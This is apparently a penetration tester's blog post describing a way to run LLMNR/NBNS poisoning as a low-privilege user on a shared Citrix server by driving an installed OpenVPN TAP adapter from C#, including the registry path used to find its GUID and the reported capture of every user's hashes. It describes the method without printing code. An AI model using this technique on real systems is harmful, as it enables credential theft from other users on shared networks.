One problem with Responder etc is that running it as a low-privilege user on a Windows box is damned near impossible. Windows already claims the ports that it needs, so any form of poisoning isnt going to work.

Recently I was playing with a shared Citrix server and noticed that someone had installed OpenVPN and the TAP adapter it installs was present.

I started thinking about ways to have fun with this, I couldnt make connections out of the network for other reasons so thought “what if I write a tool that pretends to be a network?”

I found some articles about using the TAP adapters with C#, its not too tough but relies on native methods to do so. The main problem is that as a low priv user its hard to find the adapters GUID, most reg keys that absolutely identify it are non-readable. For example most of the config info is kept under “SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}”, but individual keys here cant be read

After some digging about in the registry you can find the GUID by cycling over the subkeys of “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}” and looking at the ConnectionName values.

One the GUID was found the tool could open the TAP adapter device and start reading/pushing traffic to the NIC. The first thing I wrote was a simple NBNS/LLMNR responder, as the data coming out of the adapter is raw ethernet frames I had some fun writing packets by hand.

This appeared to work well, given that there is virtually zero latency between a broadcast request and a response the poisoner always wins over any other responses. Couple this with a copy of responder running somewhere else and WPAD poisoning is possible, on the first test it dumped hashes for every person currently using the Citrix server 🙂

The code is a mess but available here. Its a VS project but entirely in one source file so its possible to drop the .cs file on a server and compile it with csc.exe easily.